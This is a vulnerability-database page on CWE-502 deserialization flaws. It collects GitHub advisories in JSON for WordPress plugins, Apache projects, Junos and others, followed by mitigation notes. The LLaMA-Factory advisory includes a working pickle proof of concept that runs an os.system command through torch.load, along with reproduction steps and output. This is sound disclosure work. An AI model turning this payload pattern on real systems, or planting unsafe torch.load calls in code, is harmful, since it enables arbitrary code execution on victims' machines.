CWE-502
AllowedDeserialization of Untrusted Data
Abstraction: Base · Status: Draft
The product deserializes untrusted data without sufficiently ensuring that the resulting data will be valid.
4797 vulnerabilities reference this CWE, most recent first.
GHSA-CXQP-32C8-CH8C
Vulnerability from github – Published: 2024-03-20 15:32 – Updated: 2025-05-13 00:31Deserialization of Untrusted Data vulnerability in Social Media Share Buttons By Sygnoos Social Media Share Buttons.This issue affects Social Media Share Buttons: from n/a through 2.1.0.
{
"affected": [],
"aliases": [
"CVE-2024-2721"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2024-03-20T12:15:08Z",
"severity": "HIGH"
},
"details": "Deserialization of Untrusted Data vulnerability in Social Media Share Buttons By Sygnoos Social Media Share Buttons.This issue affects Social Media Share Buttons: from n/a through 2.1.0.",
"id": "GHSA-cxqp-32c8-ch8c",
"modified": "2025-05-13T00:31:10Z",
"published": "2024-03-20T15:32:57Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2024-2721"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/vulnerability/social-media-builder/wordpress-social-media-share-buttons-plugin-2-1-0-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:N",
"type": "CVSS_V3"
}
]
}
GHSA-CXQR-JHPF-63MM
Vulnerability from github – Published: 2026-07-14 06:31 – Updated: 2026-07-14 15:32The Newsletters WordPress plugin before 4.15 does not prevent deserialization of untrusted input that is stored through a public form, allowing unauthenticated attackers to inject a PHP object and, via a property-oriented gadget chain bundled with the Newsletters WordPress plugin before 4.15, write arbitrary files and execute code on the server.
{
"affected": [],
"aliases": [
"CVE-2026-12583"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-07-14T06:17:05Z",
"severity": "HIGH"
},
"details": "The Newsletters WordPress plugin before 4.15 does not prevent deserialization of untrusted input that is stored through a public form, allowing unauthenticated attackers to inject a PHP object and, via a property-oriented gadget chain bundled with the Newsletters WordPress plugin before 4.15, write arbitrary files and execute code on the server.",
"id": "GHSA-cxqr-jhpf-63mm",
"modified": "2026-07-14T15:32:15Z",
"published": "2026-07-14T06:31:23Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-12583"
},
{
"type": "WEB",
"url": "https://wpscan.com/vulnerability/e4c44105-f43d-4dff-8487-7d8ae2691c4e"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-CXVC-G8F2-4GMM
Vulnerability from github – Published: 2025-09-08 09:31 – Updated: 2025-11-05 20:43There is a serialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons.
This issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1.
Deployments that accept JNDI URIs for JCR lookup from untrusted users allows them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are adviced to review their use of JNDI URI for JCR lookup.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.jackrabbit:jackrabbit-core"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "2.22.2"
}
],
"type": "ECOSYSTEM"
}
]
},
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.jackrabbit:jackrabbit-jcr-commons"
},
"ranges": [
{
"events": [
{
"introduced": "1.0.0"
},
{
"fixed": "2.22.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-58782"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-09-09T15:14:38Z",
"nvd_published_at": "2025-09-08T09:15:30Z",
"severity": "MODERATE"
},
"details": "There is a serialization of Untrusted Data vulnerability in Apache Jackrabbit Core and Apache Jackrabbit JCR Commons.\n\nThis issue affects Apache Jackrabbit Core: from 1.0.0 through 2.22.1; Apache Jackrabbit JCR Commons: from 1.0.0 through 2.22.1.\n\nDeployments that accept JNDI URIs for JCR lookup from untrusted users allows them to inject malicious JNDI references, potentially leading to arbitrary code execution through deserialization of untrusted data. Users are recommended to upgrade to version 2.22.2. JCR lookup through JNDI has been disabled by default in 2.22.2. Users of this feature need to enable it explicitly and are adviced to review their use of JNDI URI for JCR lookup.",
"id": "GHSA-cxvc-g8f2-4gmm",
"modified": "2025-11-05T20:43:58Z",
"published": "2025-09-08T09:31:09Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-58782"
},
{
"type": "WEB",
"url": "https://github.com/apache/jackrabbit/pull/229"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/jackrabbit"
},
{
"type": "WEB",
"url": "https://issues.apache.org/jira/browse/JCR-5135"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/t4wdrost6dh17dh406g792j9wq6xmy6v"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2025/09/06/3"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:N",
"type": "CVSS_V3"
}
],
"summary": "Apache Jackrabbit: Core and JCR Commons are vulnerable to Deserialization of Untrusted Data"
}
GHSA-CXVR-5HWP-CJHJ
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35Unauthenticated PHP Object Injection in Laurits <= 1.5.1 versions.
{
"affected": [],
"aliases": [
"CVE-2026-40736"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-17T13:20:35Z",
"severity": "HIGH"
},
"details": "Unauthenticated PHP Object Injection in Laurits \u003c= 1.5.1 versions.",
"id": "GHSA-cxvr-5hwp-cjhj",
"modified": "2026-06-17T18:35:50Z",
"published": "2026-06-17T18:35:50Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40736"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/theme/laurits/vulnerability/wordpress-laurits-theme-1-5-1-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F22C-XFCP-G8P7
Vulnerability from github – Published: 2022-10-18 12:00 – Updated: 2022-10-18 12:00An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.
{
"affected": [],
"aliases": [
"CVE-2022-22241"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2022-10-18T03:15:00Z",
"severity": "HIGH"
},
"details": "An Improper Input Validation vulnerability in the J-Web component of Juniper Networks Junos OS may allow an unauthenticated attacker to access data without proper authorization. Utilizing a crafted POST request, deserialization may occur which could lead to unauthorized local file access or the ability to execute arbitrary commands. This issue affects Juniper Networks Junos OS: all versions prior to 19.1R3-S9; 19.2 versions prior to 19.2R3-S6; 19.3 versions prior to 19.3R3-S7; 19.4 versions prior to 19.4R2-S7, 19.4R3-S9; 20.1 versions prior to 20.1R3-S5; 20.2 versions prior to 20.2R3-S5; 20.3 versions prior to 20.3R3-S5; 20.4 versions prior to 20.4R3-S4; 21.1 versions prior to 21.1R3-S2; 21.2 versions prior to 21.2R3-S1; 21.3 versions prior to 21.3R2-S2, 21.3R3; 21.4 versions prior to 21.4R1-S2, 21.4R2-S1, 21.4R3; 22.1 versions prior to 22.1R1-S1, 22.1R2.",
"id": "GHSA-f22c-xfcp-g8p7",
"modified": "2022-10-18T12:00:30Z",
"published": "2022-10-18T12:00:30Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-22241"
},
{
"type": "WEB",
"url": "https://kb.juniper.net/JSA69899"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F23H-52HJ-99P6
Vulnerability from github – Published: 2023-12-21 12:30 – Updated: 2025-02-13 19:30Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.
Users are recommended to upgrade to version 1.2.2, which fixes the issue.
{
"affected": [
{
"package": {
"ecosystem": "Maven",
"name": "org.apache.iotdb:iotdb-parent"
},
"ranges": [
{
"events": [
{
"introduced": "0.13.0"
},
{
"fixed": "1.2.2"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2023-51656"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2023-12-21T18:10:56Z",
"nvd_published_at": "2023-12-21T12:15:08Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in Apache IoTDB.This issue affects Apache IoTDB: from 0.13.0 through 0.13.4.\n\nUsers are recommended to upgrade to version 1.2.2, which fixes the issue.",
"id": "GHSA-f23h-52hj-99p6",
"modified": "2025-02-13T19:30:31Z",
"published": "2023-12-21T12:30:29Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2023-51656"
},
{
"type": "PACKAGE",
"url": "https://github.com/apache/iotdb"
},
{
"type": "WEB",
"url": "https://lists.apache.org/thread/zy3klwpv11vl5n65josbfo2fyzxg3dxc"
},
{
"type": "WEB",
"url": "http://www.openwall.com/lists/oss-security/2023/12/21/5"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
],
"summary": "Apache IoTDB: Unsafe deserialize map in Sync Tool"
}
GHSA-F253-RMGF-G82M
Vulnerability from github – Published: 2026-06-17 18:35 – Updated: 2026-06-17 18:35Unauthenticated PHP Object Injection in Hiroshi <= 1.5.1 versions.
{
"affected": [],
"aliases": [
"CVE-2026-39560"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-06-17T14:17:51Z",
"severity": "HIGH"
},
"details": "Unauthenticated PHP Object Injection in Hiroshi \u003c= 1.5.1 versions.",
"id": "GHSA-f253-rmgf-g82m",
"modified": "2026-06-17T18:35:54Z",
"published": "2026-06-17T18:35:54Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2026-39560"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/wordpress/theme/hiroshi/vulnerability/wordpress-hiroshi-theme-1-5-1-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F25W-7VP8-H4HW
Vulnerability from github – Published: 2023-01-26 21:30 – Updated: 2023-02-01 18:30vRealize Log Insight contains a deserialization vulnerability. An unauthenticated malicious actor can remotely trigger the deserialization of untrusted data which could result in a denial of service.
{
"affected": [],
"aliases": [
"CVE-2022-31710"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2023-01-26T21:15:00Z",
"severity": "HIGH"
},
"details": "vRealize Log Insight contains a deserialization vulnerability. An unauthenticated malicious actor can remotely trigger the deserialization of untrusted data which could result in a denial of service.",
"id": "GHSA-f25w-7vp8-h4hw",
"modified": "2023-02-01T18:30:24Z",
"published": "2023-01-26T21:30:25Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31710"
},
{
"type": "WEB",
"url": "https://www.vmware.com/security/advisories/VMSA-2023-0001.html"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F29P-M33V-73CJ
Vulnerability from github – Published: 2026-02-20 18:31 – Updated: 2026-02-25 00:31Deserialization of Untrusted Data vulnerability in BoldThemes Ippsum ippsum allows Object Injection.This issue affects Ippsum: from n/a through <= 1.2.0.
{
"affected": [],
"aliases": [
"CVE-2025-68541"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": false,
"github_reviewed_at": null,
"nvd_published_at": "2026-02-20T16:22:11Z",
"severity": "CRITICAL"
},
"details": "Deserialization of Untrusted Data vulnerability in BoldThemes Ippsum ippsum allows Object Injection.This issue affects Ippsum: from n/a through \u003c= 1.2.0.",
"id": "GHSA-f29p-m33v-73cj",
"modified": "2026-02-25T00:31:21Z",
"published": "2026-02-20T18:31:35Z",
"references": [
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-68541"
},
{
"type": "WEB",
"url": "https://patchstack.com/database/Wordpress/Theme/ippsum/vulnerability/wordpress-ippsum-theme-1-2-0-php-object-injection-vulnerability?_s_id=cve"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"type": "CVSS_V3"
}
]
}
GHSA-F2F7-GJ54-6VPV
Vulnerability from github – Published: 2025-04-23 22:21 – Updated: 2025-06-28 00:04Description
A critical vulnerability exists in the llamafy_baichuan2.py script of the LLaMA-Factory project. The script performs insecure deserialization using torch.load() on user-supplied .bin files from an input directory. An attacker can exploit this behavior by crafting a malicious .bin file that executes arbitrary commands during deserialization.
Attack Vector
This vulnerability is exploitable without authentication or privileges when a user is tricked into:
- Downloading or cloning a malicious project folder containing a crafted
.binfile (e.g. via zip file, GitHub repo). - Running the provided conversion script
llamafy_baichuan2.py, either manually or as part of an example workflow.
No elevated privileges are required. The user only needs to run the script with an attacker-supplied --input_dir.
Impact
- Arbitrary command execution (RCE)
- System compromise
- Persistence or lateral movement in shared compute environments
Proof of Concept (PoC)
# malicious_payload.py
import torch, pickle, os
class MaliciousPayload:
def __reduce__(self):
return (os.system, ("mkdir HACKED!",)) # Arbitrary command
malicious_data = {
"v_head.summary.weight": MaliciousPayload(),
"v_head.summary.bias": torch.randn(10)
}
with open("value_head.bin", "wb") as f:
pickle.dump(malicious_data, f)
An example of config.json:
{
"model": "value_head.bin",
"hidden_size": 4096,
"num_attention_heads": 32,
"num_hidden_layers": 24,
"initializer_range": 0.02,
"intermediate_size": 11008,
"max_position_embeddings": 4096,
"kv_channels": 128,
"layer_norm_epsilon": 1e-5,
"tie_word_embeddings": false,
"vocab_size": 151936
}
(base) root@d6ab70067470:~/LLaMA-Factory_latest# tree
.
`-- LLaMA-Factory
|-- LICENSE
|-- README.md
|-- malicious_folder
| |-- config.json
| `-- value_head.bin
`-- xxxxx(Irrelevant documents omitted)
# Reproduction
python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out
➡️ Running this will execute the malicious payload and create a HACKED! folder.
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls
CITATION.cff LICENSE MANIFEST.in Makefile README.md README_zh.md assets data docker evaluation examples malicious_folder pyproject.toml requirements.txt scripts setup.py src tests
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out
2025-04-23 07:36:58.435304: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered
WARNING: All log messages before absl::InitializeLog() is called are written to STDERR
E0000 00:00:1745393818.451398 1008 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered
E0000 00:00:1745393818.456423 1008 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered
2025-04-23 07:36:58.472951: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.
To enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.
Load weights: 50%|██████████████████████████████████████████████████████████████████████████████████▌ | 1/2 [00:00<00:00, 123.70it/s]
Traceback (most recent call last):
File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 112, in <module>
fire.Fire(llamafy_baichuan2)
File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 135, in Fire
component_trace = _Fire(component, args, parsed_flag_args, context, name)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 468, in _Fire
component, remaining_args = _CallAndUpdateTrace(
^^^^^^^^^^^^^^^^^^^^
File "/root/miniconda3/lib/python3.12/site-packages/fire/core.py", line 684, in _CallAndUpdateTrace
component = fn(*varargs, **kwargs)
^^^^^^^^^^^^^^^^^^^^^^
File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 107, in llamafy_baichuan2
save_weight(input_dir, output_dir, shard_size, save_safetensors)
File "/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py", line 35, in save_weight
shard_weight = torch.load(os.path.join(input_dir, filepath), map_location="cpu")
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py", line 1040, in load
return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)
^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
File "/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py", line 1260, in _legacy_load
raise RuntimeError("Invalid magic number; corrupt file?")
RuntimeError: Invalid magic number; corrupt file?
(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls
CITATION.cff LICENSE Makefile README_zh.md data evaluation malicious_folder pyproject.toml scripts src
'HACKED!' MANIFEST.in README.md assets docker examples out requirements.txt setup.py tests
Affected File(s)
- https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35
scripts/convert_ckpt/llamafy_baichuan2.py- Line:
torch.load(os.path.join(input_dir, filepath), map_location="cpu")
Suggested Fix
- Replace
torch.load()with safer alternatives likesafetensors. - Validate and whitelist file types before deserialization.
- Require checksum validation.
Example patch:
# Replace torch.load() with safe deserialization
try:
from safetensors.torch import load_file
tensor_data = load_file(filepath)
except Exception:
print("Invalid or unsafe checkpoint file.")
return
Workarounds
- Avoid running the script with untrusted
.binfiles. - Use containers or VMs to isolate script execution.
References
Credits
{
"affected": [
{
"database_specific": {
"last_known_affected_version_range": "\u003c= 0.9.2"
},
"package": {
"ecosystem": "PyPI",
"name": "llamafactory"
},
"ranges": [
{
"events": [
{
"introduced": "0"
},
{
"fixed": "0.9.3"
}
],
"type": "ECOSYSTEM"
}
]
}
],
"aliases": [
"CVE-2025-46567"
],
"database_specific": {
"cwe_ids": [
"CWE-502"
],
"github_reviewed": true,
"github_reviewed_at": "2025-04-23T22:21:13Z",
"nvd_published_at": "2025-05-01T18:15:58Z",
"severity": "MODERATE"
},
"details": "### Description\n\nA critical vulnerability exists in the `llamafy_baichuan2.py` script of the [LLaMA-Factory](https://github.com/hiyouga/LLaMA-Factory) project. The script performs insecure deserialization using `torch.load()` on user-supplied `.bin` files from an input directory. An attacker can exploit this behavior by crafting a malicious `.bin` file that executes arbitrary commands during deserialization.\n\n### Attack Vector\n\nThis vulnerability is **exploitable without authentication or privileges** when a user is tricked into:\n\n1. Downloading or cloning a malicious project folder containing a crafted `.bin` file (e.g. via zip file, GitHub repo).\n2. Running the provided conversion script `llamafy_baichuan2.py`, either manually or as part of an example workflow.\n\nNo elevated privileges are required. The user only needs to run the script with an attacker-supplied `--input_dir`. \n\n### Impact\n\n- Arbitrary command execution (RCE)\n- System compromise\n- Persistence or lateral movement in shared compute environments\n\n\n### Proof of Concept (PoC)\n\n```python\n# malicious_payload.py\nimport torch, pickle, os\n\nclass MaliciousPayload:\n def __reduce__(self):\n return (os.system, (\"mkdir HACKED!\",)) # Arbitrary command\n\nmalicious_data = {\n \"v_head.summary.weight\": MaliciousPayload(),\n \"v_head.summary.bias\": torch.randn(10)\n}\n\nwith open(\"value_head.bin\", \"wb\") as f:\n pickle.dump(malicious_data, f)\n```\n\nAn example of `config.json`:\n\n```json\n{\n \"model\": \"value_head.bin\",\n \"hidden_size\": 4096,\n \"num_attention_heads\": 32,\n \"num_hidden_layers\": 24,\n \"initializer_range\": 0.02,\n \"intermediate_size\": 11008,\n \"max_position_embeddings\": 4096,\n \"kv_channels\": 128,\n \"layer_norm_epsilon\": 1e-5,\n \"tie_word_embeddings\": false,\n \"vocab_size\": 151936\n}\n```\n\n```bash\n(base) root@d6ab70067470:~/LLaMA-Factory_latest# tree\n.\n`-- LLaMA-Factory\n |-- LICENSE\n |-- README.md\n |-- malicious_folder\n | |-- config.json\n | `-- value_head.bin\n `-- xxxxx(Irrelevant documents omitted)\n```\n\n\n```bash\n# Reproduction\npython scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out\n```\n\n\u27a1\ufe0f Running this will execute the malicious payload and create a `HACKED!` folder.\n\n```bash\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls\nCITATION.cff LICENSE MANIFEST.in Makefile README.md README_zh.md assets data docker evaluation examples malicious_folder pyproject.toml requirements.txt scripts setup.py src tests\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# python scripts/convert_ckpt/llamafy_baichuan2.py --input_dir ./malicious_folder --output_dir ./out\n2025-04-23 07:36:58.435304: E external/local_xla/xla/stream_executor/cuda/cuda_fft.cc:477] Unable to register cuFFT factory: Attempting to register factory for plugin cuFFT when one has already been registered\nWARNING: All log messages before absl::InitializeLog() is called are written to STDERR\nE0000 00:00:1745393818.451398 1008 cuda_dnn.cc:8310] Unable to register cuDNN factory: Attempting to register factory for plugin cuDNN when one has already been registered\nE0000 00:00:1745393818.456423 1008 cuda_blas.cc:1418] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered\n2025-04-23 07:36:58.472951: I tensorflow/core/platform/cpu_feature_guard.cc:210] This TensorFlow binary is optimized to use available CPU instructions in performance-critical operations.\nTo enable the following instructions: AVX2 FMA, in other operations, rebuild TensorFlow with the appropriate compiler flags.\nLoad weights: 50%|\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u2588\u258c | 1/2 [00:00\u003c00:00, 123.70it/s]\nTraceback (most recent call last):\n File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 112, in \u003cmodule\u003e\n fire.Fire(llamafy_baichuan2)\n File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 135, in Fire\n component_trace = _Fire(component, args, parsed_flag_args, context, name)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 468, in _Fire\n component, remaining_args = _CallAndUpdateTrace(\n ^^^^^^^^^^^^^^^^^^^^\n File \"/root/miniconda3/lib/python3.12/site-packages/fire/core.py\", line 684, in _CallAndUpdateTrace\n component = fn(*varargs, **kwargs)\n ^^^^^^^^^^^^^^^^^^^^^^\n File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 107, in llamafy_baichuan2\n save_weight(input_dir, output_dir, shard_size, save_safetensors)\n File \"/root/LLaMA-Factory_latest/LLaMA-Factory/scripts/convert_ckpt/llamafy_baichuan2.py\", line 35, in save_weight\n shard_weight = torch.load(os.path.join(input_dir, filepath), map_location=\"cpu\")\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py\", line 1040, in load\n return _legacy_load(opened_file, map_location, pickle_module, **pickle_load_args)\n ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^\n File \"/root/miniconda3/lib/python3.12/site-packages/torch/serialization.py\", line 1260, in _legacy_load\n raise RuntimeError(\"Invalid magic number; corrupt file?\")\nRuntimeError: Invalid magic number; corrupt file?\n(base) root@d6ab70067470:~/LLaMA-Factory_latest/LLaMA-Factory# ls\n CITATION.cff LICENSE Makefile README_zh.md data evaluation malicious_folder pyproject.toml scripts src\n\u0027HACKED!\u0027 MANIFEST.in README.md assets docker examples out requirements.txt setup.py tests\n```\n\n### Affected File(s)\n\n- https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35\n- `scripts/convert_ckpt/llamafy_baichuan2.py`\n- Line: `torch.load(os.path.join(input_dir, filepath), map_location=\"cpu\")`\n\n### Suggested Fix\n\n- Replace `torch.load()` with safer alternatives like `safetensors`.\n- Validate and whitelist file types before deserialization.\n- Require checksum validation.\n\nExample patch:\n\n```python\n# Replace torch.load() with safe deserialization\ntry:\n from safetensors.torch import load_file\n tensor_data = load_file(filepath)\nexcept Exception:\n print(\"Invalid or unsafe checkpoint file.\")\n return\n```\n\n### Workarounds\n\n- Avoid running the script with untrusted `.bin` files.\n- Use containers or VMs to isolate script execution.\n\n### References\n\n- [torch.load() \u2014 PyTorch Docs](https://pytorch.org/docs/stable/generated/torch.load.html)\n- [CWE-502: Deserialization of Untrusted Data](https://cwe.mitre.org/data/definitions/502.html)\n\n### Credits\n\nDiscovered and reported by [Yu Rong](https://github.com/Anchor0221) and [Hao Fan](https://github.com/xhjy2020), 2025-04-23",
"id": "GHSA-f2f7-gj54-6vpv",
"modified": "2025-06-28T00:04:00Z",
"published": "2025-04-23T22:21:13Z",
"references": [
{
"type": "WEB",
"url": "https://github.com/hiyouga/LLaMA-Factory/security/advisories/GHSA-f2f7-gj54-6vpv"
},
{
"type": "ADVISORY",
"url": "https://nvd.nist.gov/vuln/detail/CVE-2025-46567"
},
{
"type": "WEB",
"url": "https://github.com/hiyouga/LLaMA-Factory/commit/2989d39239d2f46e584c1e1180ba46b9768afb2a"
},
{
"type": "PACKAGE",
"url": "https://github.com/hiyouga/LLaMA-Factory"
},
{
"type": "WEB",
"url": "https://github.com/hiyouga/LLaMA-Factory/blob/main/scripts/convert_ckpt/llamafy_baichuan2.py#L35"
}
],
"schema_version": "1.4.0",
"severity": [
{
"score": "CVSS:3.1/AV:L/AC:L/PR:L/UI:R/S:U/C:H/I:L/A:L",
"type": "CVSS_V3"
}
],
"summary": "LLaMA-Factory Allows Arbitrary Code Execution via Unsafe Deserialization in Ilamafy_baichuan2.py"
}
Mitigation
If available, use the signing/sealing features of the programming language to assure that deserialized data has not been tainted. For example, a hash-based message authentication code (HMAC) could be used to ensure that data has not been modified.
Mitigation
When deserializing data, populate a new object rather than just deserializing. The result is that the data flows through safe input validation and that the functions are safe.
Mitigation
Explicitly define a final object() to prevent deserialization.
Mitigation
- Make fields transient to protect them from deserialization.
- An attempt to serialize and then deserialize a class containing transient fields will result in NULLs where the transient data should be. This is an excellent way to prevent time, environment-based, or sensitive variables from being carried over and used improperly.
Mitigation
